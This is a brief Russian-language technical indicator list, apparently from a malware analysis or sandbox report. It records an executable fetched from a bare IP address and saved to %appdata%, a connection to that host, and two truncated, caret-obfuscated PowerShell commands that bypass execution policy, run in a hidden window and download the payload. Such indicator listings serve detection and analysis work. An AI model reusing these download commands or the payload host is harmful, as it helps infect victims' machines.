Техническая информация
- http://84.200.4.102/dwpc.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^O^wER^s^H^ElL.E^xE^ -EXECuTIOnPo^li^CY Byp^ass^ -n^oPR^OF^ilE ^-wINd^owStYlE^ ^h^iD^dEN (^ne^W-^ob^JEcT ^SYSTe^m^.^NEt.w^EbcLiE^nT^).d^o^wn^LOa^Df^iL^E^(^'http://84.200.4.102/dwp...
- '84.##0.4.102':80
- '<SYSTEM32>\cmd.exe' /C "p^O^wER^s^H^ElL.E^xE^ -EXECuTIOnPo^li^CY Byp^ass^ -n^oPR^OF^ilE ^-wINd^owStYlE^ ^h^iD^dEN (^ne^W-^ob^JEcT ^SYSTe^m^.^NEt.w^EbcLiE^nT^).d^o^wn^LOa^Df^iL^E^(^'http://84.200.4.102/dwp...' (со скрытым окном)